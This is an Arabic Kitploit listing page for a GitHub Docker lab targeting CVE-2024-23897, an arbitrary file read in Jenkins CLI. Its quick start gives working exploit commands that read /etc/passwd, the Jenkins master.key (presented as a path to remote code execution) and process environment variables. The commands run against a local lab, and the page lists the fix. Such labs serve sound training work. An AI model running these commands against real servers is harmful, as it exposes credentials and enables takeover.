Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-23897 — مختبر قائم على Docker ونص استغلال لـ CVE-2024-23897، قراءة ملفات عشوائية حرجة في Jenkins CLI عبر args4j expandAtFiles، مع خطوات للتسلسل إلى RCE. | Kitploit
أدوات/GitHubGitHub/dungsocool/cve-2024-23897
ماسحات الثغرات الأمنيةالاستغلالأمن الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubdungsocool/cve-2024-23897

CVE-2024-23897

مختبر قائم على Docker ونص استغلال لـ CVE-2024-23897، قراءة ملفات عشوائية حرجة في Jenkins CLI عبر args4j expandAtFiles، مع خطوات للتسلسل إلى RCE.

عرض المستودع
63منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-23897 — قراءة ملف تعسفي في Jenkins CLI

بدء سريع

# 1. Start lab
docker-compose up -d

# 2. Wait ~30s, then download CLI tool
curl -O http://localhost:8080/jnlpJars/jenkins-cli.jar

# 3. Exploit — read /etc/passwd (full file)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/etc/passwd

# 4. Read master.key (chain to RCE)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/var/jenkins_home/secrets/master.key

# 5. Read environment variables
java -jar jenkins-cli.jar -s http://localhost:8080 -http help @/proc/self/environ

التفاصيل

راجع REPORT.md للحصول على التحليل الفني الكامل (بالفيتنامية).

البندالقيمة
CVSS9.8 (حرجة)
المتأثرJenkins <= 2.441, LTS <= 2.426.2
نسخة المختبرjenkins/jenkins:2.426.2-lts
السبب الجذريargs4j expandAtFiles مفعّل في CLI من جانب الخادم
الإصلاحقم بالترقية إلى Jenkins >= 2.442 / LTS >= 2.426.3

التنظيف

docker-compose down -v --remove-orphans
تنزيل الأداة